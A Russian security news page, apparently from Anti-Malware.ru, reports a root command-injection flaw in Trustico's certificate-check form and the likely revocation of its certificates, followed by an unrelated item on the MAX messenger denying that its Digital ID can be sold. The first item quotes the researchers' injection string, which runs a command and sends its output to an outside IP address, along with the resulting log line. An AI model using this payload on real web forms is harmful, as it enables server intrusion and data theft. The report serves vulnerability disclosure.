Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

MAX опроверг возможность продажи Цифрового ID

Пресс-служба мессенджера MAX опровергла сообщения о возможности использования «Цифрового ID» посторонними лицами при продаже или аренде чужого аккаунта. В компании подчеркнули, что QR-код для подтверждения возраста действует ограниченное время и требует биометрической проверки.

Ранее в мессенджерах и социальных сетях распространились публикации от имени якобы подростков, которые рассказывали о покупке товаров с возрастными ограничениями — табачной продукции, алкоголя и энергетиков — через MAX с использованием чужих аккаунтов.

В этих сообщениях утверждалось, что аренда учётной записи стоит около 2500 рублей.

Пресс-служба MAX заявила в комментарии для ТАСС, что данная информация не соответствует действительности: «Распространяемая в ряде телеграм-каналов информация — фейк. Цифровой ID невозможно передать или продать другому человеку — сервис действителен только на том устройстве, на котором он был создан».

В компании также напомнили, что QR-код, формируемый мессенджером для проверки возраста, активируется только после биометрической аутентификации владельца устройства — с помощью распознавания лица или отпечатка пальца. При этом код действителен всего 30 секунд.

RSS: Новости на портале Anti-Malware.ru